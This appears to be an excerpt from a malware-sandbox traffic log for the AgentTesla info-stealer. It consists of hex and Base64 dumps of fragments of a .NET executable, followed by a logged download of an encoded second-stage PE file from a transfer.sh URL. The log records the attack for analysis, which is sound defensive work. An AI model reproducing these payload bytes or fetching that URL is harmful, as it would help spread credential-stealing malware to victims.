                            2022-03-14 16:02:10 UTC48INData Raw: 41 43 63 42 68 30 66 61 5a 77 47 48 68 39 7a 6e 41 59 66 43 53 43 76 41 41 41 41 6e 41 59 66 43 69 44 2f 41 41 41 41 6e 41 61 41 5a 77 41 41 42 43 6f 65 47 7a 41 44 41 44 6b 41 41 41 42 64 41 41 41 52 48 78 77 6f 75 77 41 41 43 69 68 72 41 77 41 47 4b 43 51 41 41 41 6f 6f 4e 51 4d 41 42 69 68 73 41 77 41 47 4b 4c 55 41 41 41 59 4b 33 68 51 6c 4b 44 63 41 41 41 6f 4c 63 37 6f 41 41 41 6f 4b 4b 44 67 41 41 41 72 65 41 41 59 71 41 41 41 41 41 52 41 41 41 41 41 41 41 41 41 6a 49 77 41 55 47 67 41 41 41 52 73 77 41 77 42 63 41 41 41 41 58 67 41 41 45 58 4f 36 41 41 41 4b 43 67 5a 2b 4b 67 45 41 42 43 67 58 41 67 41 47 4b 45 55 44 41 41 59 6f 47 41 49 41 42 6d 2f 47 41 41 41 4b 33 67 34 6c 4b 44 63 41 41 41 6f 4d 4b 44 67 41 41 41 72 65 41 41 5a 2b 4b 67 45 41
                            Data Ascii: ACcBh0faZwGHh9znAYfCSCvAAAAnAYfCiD/AAAAnAaAZwAABCoeGzADADkAAABdAAARHxwouwAACihrAwAGKCQAAAooNQMABihsAwAGKLUAAAYK3hQlKDcAAAoLc7oAAAoKKDgAAAreAAYqAAAAARAAAAAAAAAjIwAUGgAAARswAwBcAAAAXgAAEXO6AAAKCgZ+KgEABCgXAgAGKEUDAAYoGAIABm/GAAAK3g4lKDcAAAoMKDgAAAreAAZ+KgEA
                            2022-03-14 16:02:10 UTC64INData Raw: 67 45 73 42 52 59 4e 48 42 4d 46 41 42 45 46 48 76 34 42 4c 41 30 49 41 32 2b 64 41 41 41 4b 4c 46 30 66 43 52 4d 46 41 42 45 46 48 66 34 42 4c 41 67 52 42 41 6d 61 44 42 34 54 42 51 41 52 42 52 38 4a 2f 67 45 73 42 67 67 71 48 77 6f 54 42 51 41 52 42 52 7a 2b 41 53 77 46 4b 7a 51 64 45 77 55 41 45 51 55 59 2f 67 45 73 43 67 49 6f 72 67 45 41 43 67 6f 5a 45 77 55 41 45 51 55 57 2f 67 45 73 41 78 63 54 42 51 41 52 42 52 38 4b 2f 67 45 73 41 69 73 46 4f 46 6a 2f 2f 2f 38 4a 46 39 59 4e 43 52 45 45 6a 72 63 79 70 42 51 71 41 41 41 41 47 7a 41 45 41 44 49 41 41 41 41 76 41 41 41 52 41 69 77 47 41 6f 36 33 46 6a 4d 43 46 43 6f 6f 47 41 45 41 43 67 49 44 46 69 69 56 41 51 41 4b 62 78 6b 42 41 41 6f 4b 33 68 41 6c 4b 44 63 41 41 41 6f 4c 46 41 6f 6f 4f 41 41 41
                            Data Ascii: gEsBRYNHBMFABEFHv4BLA0IA2+dAAAKLF0fCRMFABEFHf4BLAgRBAmaDB4TBQARBR8J/gEsBggqHwoTBQARBRz+ASwFKzQdEwUAEQUY/gEsCgIorgEACgoZEwUAEQUW/gEsAxcTBQARBR8K/gEsAisFOFj///8JF9YNCREEjrcypBQqAAAAGzAEADIAAAAvAAARAiwGAo63FjMCFCooGAEACgIDFiiVAQAKbxkBAAoK3hAlKDcAAAoLFAooOAAA
                            2022-03-14 16:02:10 UTC80INData Raw: 41 41 41 43 71 49 52 43 68 66 57 45 77 6f 52 43 68 45 65 4d 65 45 49 6a 72 63 57 4d 54 63 57 45 77 73 4a 6a 72 63 52 42 49 36 33 46 39 6f 54 48 78 4d 4d 4b 78 38 52 42 42 45 4d 43 42 45 4c 6d 69 68 71 42 41 41 47 4b 43 51 41 41 41 71 69 45 51 73 58 31 68 4d 4c 45 51 77 58 31 68 4d 4d 45 51 77 52 48 7a 48 62 63 2f 49 42 41 41 6f 54 43 52 45 45 45 79 45 57 45 79 41 34 73 67 55 41 41 42 45 68 45 53 43 61 45 78 55 52 46 52 6b 58 47 58 50 7a 41 51 41 4b 45 78 45 52 45 52 51 6f 67 51 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 71 4d 50 77 41 41 41 52 4d 53 45 52 49 58 6a 44 38 41 41 41 45 6f 74 77 41 41 43 69 68 61 41 41 41 4b 46 39 61 4e 4b 77 41 41 41 52 4d 4f 46 68 4d 4e 46 68 4d 54 4b 43 34 43 41 41 59 54 44 78 59 54
                            Data Ascii: AAACqIRChfWEwoRChEeMeEIjrcWMTcWEwsJjrcRBI63F9oTHxMMKx8RBBEMCBELmihqBAAGKCQAAAqiEQsX1hMLEQwX1hMMEQwRHzHbc/IBAAoTCREEEyEWEyA4sgUAABEhESCaExURFRkXGXPzAQAKExERERQogQIABhaNBwAAARQUFCijAAAKKFoAAAqMPwAAARMSERIXjD8AAAEotwAACihaAAAKF9aNKwAAARMOFhMNFhMTKC4CAAYTDxYT
                            2022-03-14 16:02:10 UTC96INData Raw: 39 70 76 38 67 41 41 43 6d 38 6d 41 67 41 4b 42 32 38 6e 41 67 41 4b 4f 57 48 2f 2f 2f 2f 65 43 67 63 73 42 67 64 76 56 77 41 41 43 74 77 71 41 41 41 41 41 52 41 41 41 41 49 41 48 41 43 6d 77 67 41 4b 41 41 41 41 41 42 4d 77 41 67 41 6f 41 41 41 41 43 41 41 41 45 52 59 4c 4b 78 73 41 42 78 66 2b 41 53 77 43 47 41 73 41 42 78 62 2b 41 53 77 43 46 77 73 41 42 78 6a 2b 41 53 77 43 4b 77 49 72 34 77 4a 37 61 41 41 41 42 43 6f 69 41 67 4e 39 61 41 41 41 42 43 6f 41 41 41 41 54 4d 41 49 41 4b 41 41 41 41 41 59 41 41 42 45 57 43 79 73 62 41 41 63 58 2f 67 45 73 41 68 67 4c 41 41 63 57 2f 67 45 73 41 68 63 4c 41 41 63 59 2f 67 45 73 41 69 73 43 4b 2b 4d 43 65 32 6b 41 41 41 51 71 49 67 49 44 66 57 6b 41 41 41 51 71 41 41 41 41 45 7a 41 43 41 43 67 41 41 41 41 47
                            Data Ascii: 9pv8gAACm8mAgAKB28nAgAKOWH////eCgcsBgdvVwAACtwqAAAAARAAAAIAHACmwgAKAAAAABMwAgAoAAAACAAAERYLKxsABxf+ASwCGAsABxb+ASwCFwsABxj+ASwCKwIr4wJ7aAAABCoiAgN9aAAABCoAAAATMAIAKAAAAAYAABEWCysbAAcX/gEsAhgLAAcW/gEsAhcLAAcY/gEsAisCK+MCe2kAAAQqIgIDfWkAAAQqAAAAEzACACgAAAAG
                            2022-03-14 16:02:10 UTC112INData Raw: 41 6f 58 6a 56 38 41 41 41 45 54 42 78 45 48 46 68 38 73 6e 52 45 48 62 30 77 42 41 41 6f 4b 46 67 61 4f 74 78 66 61 45 77 67 54 42 44 69 71 41 51 41 41 42 68 45 45 42 68 45 45 6d 69 69 63 41 41 41 4b 4b 46 45 43 41 41 71 69 42 68 45 45 6d 68 51 6f 79 77 51 41 42 68 65 4e 42 77 41 41 41 52 4d 4a 45 51 6b 57 4b 4d 77 45 41 41 61 69 45 51 6b 55 46 42 51 6f 6f 77 41 41 43 68 65 4d 4c 77 41 41 41 52 59 6f 39 41 45 41 43 69 78 57 42 68 45 45 42 68 45 45 6d 68 51 6f 76 67 4d 41 42 68 69 4e 42 77 41 41 41 52 4d 4b 45 51 6f 57 46 6f 77 2f 41 41 41 42 6f 68 45 4b 46 77 59 52 42 4a 6f 55 4b 49 45 43 41 41 59 57 6a 51 63 41 41 41 45 55 46 42 51 6f 6f 77 41 41 43 68 65 4d 50 77 41 41 41 53 69 33 41 41 41 4b 6f 68 45 4b 46 42 51 55 4b 4b 4d 41 41 41 6f 6f 45 51 41 41
                            Data Ascii: AoXjV8AAAETBxEHFh8snREHb0wBAAoKFgaOtxfaEwgTBDiqAQAABhEEBhEEmiicAAAKKFECAAqiBhEEmhQoywQABheNBwAAARMJEQkWKMwEAAaiEQkUFBQoowAACheMLwAAARYo9AEACixWBhEEBhEEmhQovgMABhiNBwAAARMKEQoWFow/AAABohEKFwYRBJoUKIECAAYWjQcAAAEUFBQoowAACheMPwAAASi3AAAKohEKFBQUKKMAAAooEQAA
                            2022-03-14 16:02:10 UTC128INData Raw: 41 73 44 65 79 55 42 41 41 51 73 32 42 6f 54 42 67 41 52 42 68 38 4f 2f 67 45 73 46 77 4a 37 44 67 45 41 42 41 6b 6f 6d 51 49 41 43 68 59 59 62 36 6b 41 41 41 6f 66 44 78 4d 47 41 42 45 47 48 77 76 2b 41 53 77 4b 49 41 41 49 41 41 41 4e 48 77 77 54 42 67 41 52 42 68 33 2b 41 53 77 51 42 77 4e 37 47 67 45 41 42 47 2b 59 41 41 41 4b 43 68 34 54 42 67 41 52 42 68 38 54 2f 67 45 73 47 67 4a 37 44 67 45 41 42 41 69 4f 74 37 59 6f 6d 51 49 41 43 68 59 59 62 36 6b 41 41 41 6f 66 46 42 4d 47 41 42 45 47 47 50 34 42 4c 42 41 43 65 77 34 42 41 41 52 76 68 67 49 41 43 68 4d 45 47 52 4d 47 41 42 45 47 48 78 62 2b 41 53 77 5a 41 77 4a 37 44 67 45 41 42 47 2b 47 41 67 41 4b 45 51 54 61 75 48 30 66 41 51 41 45 48 78 63 54 42 67 41 52 42 68 38 52 2f 67 45 73 47 51 4a 37
                            Data Ascii: AsDeyUBAAQs2BoTBgARBh8O/gEsFwJ7DgEABAkomQIAChYYb6kAAAofDxMGABEGHwv+ASwKIAAIAAANHwwTBgARBh3+ASwQBwN7GgEABG+YAAAKCh4TBgARBh8T/gEsGgJ7DgEABAiOt7YomQIAChYYb6kAAAofFBMGABEGGP4BLBACew4BAARvhgIAChMEGRMGABEGHxb+ASwZAwJ7DgEABG+GAgAKEQTauH0fAQAEHxcTBgARBh8R/gEsGQJ7
                            2022-03-14 16:02:10 UTC144INData Raw: 52 6a 57 32 68 4d 45 48 79 49 54 43 77 41 52 43 78 38 56 2f 67 45 73 43 51 69 4f 74 78 4d 45 48 78 59 54 43 77 41 52 43 78 38 74 2f 67 45 73 45 77 4d 4a 46 39 61 52 46 39 6f 58 31 6f 30 72 41 41 41 42 44 42 38 75 45 77 73 41 45 51 73 63 2f 67 45 73 43 41 4d 4a 6b 52 4d 4b 48 52 4d 4c 41 42 45 4c 48 78 66 2b 41 53 77 57 42 32 2f 38 41 51 41 47 41 67 68 76 39 77 45 41 42 6d 2f 53 41 67 41 4b 48 78 67 54 43 77 41 52 43 78 38 6b 2f 67 45 73 45 51 4d 4a 47 4e 59 49 46 68 45 45 4b 42 63 42 41 41 6f 66 4a 52 4d 4c 41 42 45 4c 48 77 7a 2b 41 53 77 4a 4f 41 76 2b 2f 2f 38 66 44 52 4d 4c 41 42 45 4c 48 79 4c 2b 41 53 77 47 4b 39 49 66 49 78 4d 4c 41 42 45 4c 48 7a 33 2b 41 53 77 4e 41 34 36 33 43 52 6a 57 32 68 4d 45 48 7a 34 54 43 77 41 52 43 78 38 79 2f 67 45 73
                            Data Ascii: RjW2hMEHyITCwARCx8V/gEsCQiOtxMEHxYTCwARCx8t/gEsEwMJF9aRF9oX1o0rAAABDB8uEwsAEQsc/gEsCAMJkRMKHRMLABELHxf+ASwWB2/8AQAGAghv9wEABm/SAgAKHxgTCwARCx8k/gEsEQMJGNYIFhEEKBcBAAofJRMLABELHwz+ASwJOAv+//8fDRMLABELHyL+ASwGK9IfIxMLABELHz3+ASwNA463CRjW2hMEHz4TCwARCx8y/gEs
                            2022-03-14 16:02:10 UTC160INData Raw: 41 63 57 2f 67 45 73 41 68 63 4c 41 41 63 61 2f 67 45 73 41 69 73 43 4b 37 63 47 4b 6c 4a 2b 6d 51 45 41 42 42 61 61 4a 53 30 4a 4a 68 59 57 46 69 67 74 41 67 41 47 4b 6c 4a 2b 6d 51 45 41 42 42 65 61 4a 53 30 4a 4a 68 63 57 47 43 67 74 41 67 41 47 4b 6c 5a 2b 6d 51 45 41 42 42 69 61 4a 53 30 4b 4a 68 67 59 48 78 4d 6f 4c 51 49 41 42 69 70 61 66 70 6b 42 41 41 51 5a 6d 69 55 74 43 79 59 5a 48 78 55 66 45 79 67 74 41 67 41 47 4b 6c 5a 2b 6d 51 45 41 42 42 71 61 4a 53 30 4b 4a 68 6f 66 4b 42 6f 6f 4c 51 49 41 42 69 70 57 66 70 6b 42 41 41 51 62 6d 69 55 74 43 69 59 62 48 79 77 61 4b 43 30 43 41 41 59 71 57 6e 36 5a 41 51 41 45 48 4a 6f 6c 4c 51 73 6d 48 42 38 77 48 77 77 6f 4c 51 49 41 42 69 70 61 66 70 6b 42 41 41 51 64 6d 69 55 74 43 79 59 64 48 7a 77 66
                            Data Ascii: AcW/gEsAhcLAAca/gEsAisCK7cGKlJ+mQEABBaaJS0JJhYWFigtAgAGKlJ+mQEABBeaJS0JJhcWGCgtAgAGKlZ+mQEABBiaJS0KJhgYHxMoLQIABipafpkBAAQZmiUtCyYZHxUfEygtAgAGKlZ+mQEABBqaJS0KJhofKBooLQIABipWfpkBAAQbmiUtCiYbHywaKC0CAAYqWn6ZAQAEHJolLQsmHB8wHwwoLQIABipafpkBAAQdmiUtCyYdHzwf
                            2022-03-14 16:02:10 UTC176INData Raw: 68 63 41 41 42 38 62 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 59 42 41 41 43 61 4a 53 30 53 4a 69 43 47 41 51 41 41 49 47 45 58 41 41 41 66 4a 43 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 43 48 41 51 41 41 6d 69 55 74 45 69 59 67 68 77 45 41 41 43 43 46 46 77 41 41 48 78 6f 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 69 41 45 41 41 4a 6f 6c 4c 52 49 6d 49 49 67 42 41 41 41 67 6e 78 63 41 41 42 38 4b 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 6b 42 41 41 43 61 4a 53 30 53 4a 69 43 4a 41 51 41 41 49 4b 6b 58 41 41 41 66 43 79 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 4b 41 51 41 41 6d 69 55 74 45 53 59 67 69 67 45 41 41 43 43 30 46 77 41 41 48 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 4c 41 51 41 41
                            Data Ascii: hcAAB8bKC0CAAYqhn6ZAQAEIIYBAACaJS0SJiCGAQAAIGEXAAAfJCgtAgAGKoZ+mQEABCCHAQAAmiUtEiYghwEAACCFFwAAHxooLQIABiqGfpkBAAQgiAEAAJolLRImIIgBAAAgnxcAAB8KKC0CAAYqhn6ZAQAEIIkBAACaJS0SJiCJAQAAIKkXAAAfCygtAgAGKoJ+mQEABCCKAQAAmiUtESYgigEAACC0FwAAHSgtAgAGKoJ+mQEABCCLAQAA
                            2022-03-14 16:02:10 UTC192INData Raw: 41 59 71 68 6e 36 5a 41 51 41 45 49 50 51 43 41 41 43 61 4a 53 30 53 4a 69 44 30 41 67 41 41 49 49 30 73 41 41 41 66 43 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 44 31 41 67 41 41 6d 69 55 74 45 53 59 67 39 51 49 41 41 43 43 58 4c 41 41 41 47 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 44 32 41 67 41 41 6d 69 55 74 45 53 59 67 39 67 49 41 41 43 43 61 4c 41 41 41 47 69 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 44 33 41 67 41 41 6d 69 55 74 45 69 59 67 39 77 49 41 41 43 43 65 4c 41 41 41 48 78 41 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 2b 41 49 41 41 4a 6f 6c 4c 52 49 6d 49 50 67 43 41 41 41 67 72 69 77 41 41 42 38 57 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 50 6b 43 41 41 43 61 4a 53 30 52 4a 69 44 35 41 67 41 41
                            Data Ascii: AYqhn6ZAQAEIPQCAACaJS0SJiD0AgAAII0sAAAfCigtAgAGKoJ+mQEABCD1AgAAmiUtESYg9QIAACCXLAAAGSgtAgAGKoJ+mQEABCD2AgAAmiUtESYg9gIAACCaLAAAGigtAgAGKoZ+mQEABCD3AgAAmiUtEiYg9wIAACCeLAAAHxAoLQIABiqGfpkBAAQg+AIAAJolLRImIPgCAAAgriwAAB8WKC0CAAYqgn6ZAQAEIPkCAACaJS0RJiD5AgAA
                            2022-03-14 16:02:10 UTC208INData Raw: 75 62 57 68 59 57 4f 67 49 6d 61 6e 6f 79 57 69 6f 2b 50 72 37 65 68 69 35 75 5a 6c 4a 79 61 73 70 32 65 73 35 65 55 67 35 4f 45 68 38 79 73 2b 61 71 76 2f 4b 79 76 34 50 50 31 38 66 6e 72 38 36 47 6e 34 76 62 68 37 2b 6d 2b 38 65 75 78 35 4f 65 7a 34 4c 4c 6b 37 42 4e 4b 53 58 35 48 51 57 46 4b 54 31 64 54 47 32 39 4a 56 31 46 62 56 56 74 63 54 58 42 61 61 6c 74 64 41 77 4e 70 64 56 56 47 62 30 6c 6e 61 48 78 72 58 32 68 77 61 6d 46 74 53 48 4a 70 5a 33 39 70 4b 58 67 71 65 33 38 70 63 79 73 39 4a 53 4d 6c 4a 7a 68 65 57 51 6c 52 51 77 31 59 57 31 4e 4f 55 41 64 53 56 56 56 56 47 42 6c 4f 54 6b 35 48 42 45 39 43 51 30 42 48 52 30 4a 43 52 41 67 75 4f 69 49 72 49 79 6b 35 59 67 63 43 63 58 5a 33 64 48 56 71 61 32 70 35 62 33 46 6b 61 48 4a 37 47 44 41 6c
                            Data Ascii: ubWhYWOgImanoyWio+Pr7ehi5uZlJyasp2es5eUg5OEh8ys+aqv/Kyv4PP18fnr86Gn4vbh7+m+8eux5Oez4LLk7BNKSX5HQWFKT1dTG29JV1FbVVtcTXBaaltdAwNpdVVGb0lnaHxrX2hwamFtSHJpZ39pKXgqe38pcys9JSMlJzheWQlRQw1YW1NOUAdSVVVVGBlOTk5HBE9CQ0BHR0JCRAguOiIrIyk5YgcCcXZ3dHVqa2p5b3FkaHJ7GDAl
                            2022-03-14 16:02:10 UTC224INData Raw: 41 59 49 54 43 2b 59 41 32 55 41 76 48 6f 42 41 41 41 41 42 67 67 72 4a 4e 4d 68 5a 51 44 77 65 67 45 41 41 41 41 47 43 44 73 6b 32 53 46 6c 41 50 78 36 41 51 41 41 41 41 59 59 46 53 58 6e 49 57 55 41 4a 48 73 42 41 41 41 41 42 68 67 56 4a 65 34 68 5a 67 42 51 65 77 45 41 41 41 41 47 47 42 55 6c 47 79 4a 6e 41 42 78 38 41 51 41 41 41 41 45 41 6c 77 45 59 44 32 67 41 70 48 77 42 41 41 41 41 41 51 43 58 41 62 41 4e 61 41 43 77 66 77 45 41 41 41 41 52 41 4a 63 42 6d 79 4a 6f 41 4e 53 44 41 51 41 41 41 42 45 41 6c 77 48 53 49 6d 34 41 49 49 59 42 41 41 41 41 45 51 43 58 41 64 34 69 63 41 42 6b 68 67 45 41 41 41 41 52 41 4a 63 42 35 69 4a 77 41 4b 43 47 41 51 41 41 41 42 45 41 6c 77 45 59 49 33 45 41 31 6f 59 42 41 41 41 41 42 67 44 33 42 68 4d 41 63 51 44 30
                            Data Ascii: AYITC+YA2UAvHoBAAAABggrJNMhZQDwegEAAAAGCDsk2SFlAPx6AQAAAAYYFSXnIWUAJHsBAAAABhgVJe4hZgBQewEAAAAGGBUlGyJnABx8AQAAAAEAlwEYD2gApHwBAAAAAQCXAbANaACwfwEAAAARAJcBmyJoANSDAQAAABEAlwHSIm4AIIYBAAAAEQCXAd4icABkhgEAAAARAJcB5iJwAKCGAQAAABEAlwEYI3EA1oYBAAAABgD3BhMAcQD0
                            2022-03-14 16:02:10 UTC240INData Raw: 67 49 41 41 41 43 57 41 4e 30 43 35 67 4a 39 41 45 39 61 41 67 41 41 41 4a 59 41 65 52 54 6d 41 6e 30 41 63 46 6f 43 41 41 41 41 6c 67 41 48 41 2b 59 43 66 51 43 53 57 67 49 41 41 41 43 57 41 4e 30 56 35 67 4a 39 41 4c 52 61 41 67 41 41 41 4a 59 41 4d 51 50 6d 41 6e 30 41 31 6c 6f 43 41 41 41 41 6c 67 44 67 46 75 59 43 66 51 44 33 57 67 49 41 41 41 43 57 41 47 55 44 35 67 4a 39 41 42 6c 62 41 67 41 41 41 4a 59 41 48 52 66 6d 41 6e 30 41 4f 31 73 43 41 41 41 41 6c 67 43 50 41 2b 59 43 66 51 42 64 57 77 49 41 41 41 43 57 41 45 63 58 35 67 4a 39 41 48 35 62 41 67 41 41 41 4a 59 41 75 51 50 6d 41 6e 30 41 6e 31 73 43 41 41 41 41 6c 67 44 48 46 2b 59 43 66 51 44 41 57 77 49 41 41 41 43 57 41 41 4d 45 35 67 4a 39 41 4f 46 62 41 67 41 41 41 4a 59 41 79 42 6e 6d
                            Data Ascii: gIAAACWAN0C5gJ9AE9aAgAAAJYAeRTmAn0AcFoCAAAAlgAHA+YCfQCSWgIAAACWAN0V5gJ9ALRaAgAAAJYAMQPmAn0A1loCAAAAlgDgFuYCfQD3WgIAAACWAGUD5gJ9ABlbAgAAAJYAHRfmAn0AO1sCAAAAlgCPA+YCfQBdWwIAAACWAEcX5gJ9AH5bAgAAAJYAuQPmAn0An1sCAAAAlgDHF+YCfQDAWwIAAACWAAME5gJ9AOFbAgAAAJYAyBnm
                            2022-03-14 16:02:10 UTC256INData Raw: 33 52 4e 62 32 52 70 5a 6d 6c 6c 5a 41 42 7a 5a 58 52 66 54 47 46 7a 64 45 31 76 5a 47 6c 6d 61 57 56 6b 41 48 4e 6c 64 46 39 46 62 6d 46 69 62 47 56 6b 41 47 64 6c 64 46 39 6c 62 6d 46 69 62 47 56 6b 41 48 4e 6c 64 46 39 6c 62 6d 46 69 62 47 56 6b 41 47 64 6c 64 46 39 43 65 58 52 6c 63 31 52 79 59 57 35 7a 5a 6d 56 79 63 6d 56 6b 41 47 46 6b 5a 46 39 46 62 47 46 77 63 32 56 6b 41 45 6c 7a 51 6e 6c 77 59 58 4e 7a 5a 57 51 41 5a 32 56 30 58 30 78 68 63 33 52 42 59 32 4e 6c 63 33 4e 6c 5a 41 42 7a 5a 58 52 66 54 47 46 7a 64 45 46 6a 59 32 56 7a 63 32 56 6b 41 47 64 6c 64 46 39 44 62 32 35 75 5a 57 4e 30 5a 57 51 41 59 57 52 6b 58 30 4e 76 62 58 42 73 5a 58 52 6c 5a 41 42 54 65 58 4e 30 5a 57 30 75 51 32 39 73 62 47 56 6a 64 47 6c 76 62 6e 4d 75 55 33 42 6c
                            Data Ascii: 3RNb2RpZmllZABzZXRfTGFzdE1vZGlmaWVkAHNldF9FbmFibGVkAGdldF9lbmFibGVkAHNldF9lbmFibGVkAGdldF9CeXRlc1RyYW5zZmVycmVkAGFkZF9FbGFwc2VkAElzQnlwYXNzZWQAZ2V0X0xhc3RBY2Nlc3NlZABzZXRfTGFzdEFjY2Vzc2VkAGdldF9Db25uZWN0ZWQAYWRkX0NvbXBsZXRlZABTeXN0ZW0uQ29sbGVjdGlvbnMuU3Bl
                            2022-03-14 16:02:10 UTC272INData Raw: 51 51 41 41 42 4a 35 42 41 41 42 44 67 34 46 41 41 49 4f 44 67 34 44 41 41 41 4f 42 67 41 44 44 67 34 4f 44 67 55 67 41 67 45 63 47 41 59 67 41 51 45 53 67 49 55 45 49 41 45 42 44 51 59 41 41 77 67 4f 44 67 49 45 41 41 45 43 44 67 59 41 41 52 4b 41 6b 51 34 46 41 41 41 64 45 6d 55 46 49 41 41 53 67 4a 30 46 41 41 45 42 45 6d 6b 45 41 41 45 42 44 67 59 41 41 77 45 4f 44 67 49 48 41 41 49 42 44 68 47 41 70 51 4d 47 45 6d 30 47 49 41 49 53 62 51 34 43 42 53 41 43 41 51 34 63 42 41 41 42 43 41 34 47 42 77 4d 63 44 52 45 6b 42 41 41 42 44 67 6b 46 41 41 41 53 67 4d 45 46 49 41 41 53 67 4d 55 45 41 41 45 4e 44 67 4d 41 41 42 77 51 42 77 59 4f 45 6f 44 4e 45 6f 44 52 45 6f 44 56 45 6f 44 5a 44 67 59 41 41 52 4b 41 33 51 34 46 41 41 41 53 67 4f 55 47 49 41 45 42
                            Data Ascii: QQAABJ5BAABDg4FAAIODg4DAAAOBgADDg4ODgUgAgEcGAYgAQESgIUEIAEBDQYAAwgODgIEAAECDgYAARKAkQ4FAAAdEmUFIAASgJ0FAAEBEmkEAAEBDgYAAwEODgIHAAIBDhGApQMGEm0GIAISbQ4CBSACAQ4cBAABCA4GBwMcDREkBAABDgkFAAASgMEFIAASgMUEAAENDgMAABwQBwYOEoDNEoDREoDVEoDZDgYAARKA3Q4FAAASgOUGIAEB
                            2022-03-14 16:02:10 UTC288INData Raw: 32 4e 6f 5a 57 31 68 63 79 31 74 61 57 4e 79 62 33 4e 76 5a 6e 51 74 59 32 39 74 4f 6d 46 7a 62 53 35 32 4d 69 49 2b 44 51 6f 67 49 43 41 67 50 48 4e 6c 59 33 56 79 61 58 52 35 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 4a 6c 63 58 56 6c 63 33 52 6c 5a 46 42 79 61 58 5a 70 62 47 56 6e 5a 58 4d 67 65 47 31 73 62 6e 4d 39 49 6e 56 79 62 6a 70 7a 59 32 68 6c 62 57 46 7a 4c 57 31 70 59 33 4a 76 63 32 39 6d 64 43 31 6a 62 32 30 36 59 58 4e 74 4c 6e 59 7a 49 6a 34 4e 43 69 41 67 49 43 41 67 49 43 41 67 50 48 4a 6c 63 58 56 6c 63 33 52 6c 5a 45 56 34 5a 57 4e 31 64 47 6c 76 62 6b 78 6c 64 6d 56 73 49 47 78 6c 64 6d 56 73 50 53 4a 68 63 30 6c 75 64 6d 39 72 5a 58 49 69 49 48 56 70 51 57 4e 6a 5a 58 4e 7a 50 53 4a 6d 59 57 78 7a 5a 53 49 76 50 67 30 4b 49 43 41 67
                            Data Ascii: 2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MiI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXMgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSIvPg0KICAg


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.749770144.76.136.153443C:\Users\user\Desktop\AgentTesla.exe
                            TimestampkBytes transferredDirectionData
                            2022-03-14 16:02:11 UTC289OUTGET /get/iGs052/BASE64.txt HTTP/1.1
                            Host: transfer.sh
                            2022-03-14 16:02:12 UTC289INHTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Mon, 14 Mar 2022 16:02:11 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 62124
                            Connection: close
                            Content-Disposition: attachment; filename="BASE64.txt"
                            Retry-After: Mon, 14 Mar 2022 17:02:14 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.93,102.129.143.93
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 8
                            X-Ratelimit-Reset: 1647273734
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2022-03-14 16:02:12 UTC289INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 2b 67 74 66 45 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 4b 34 41 41 41 41 47 41 41 41 41 41 41 41 41 4c 73 30 41 41 41 41 67 41 41 41 41 34 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK+gtfEAAAAAAAAAAOAADiELAVAAAK4AAAAGAAAAAAAALs0AAAAgAAAA4AAAAABAAAAgAAAAAgA
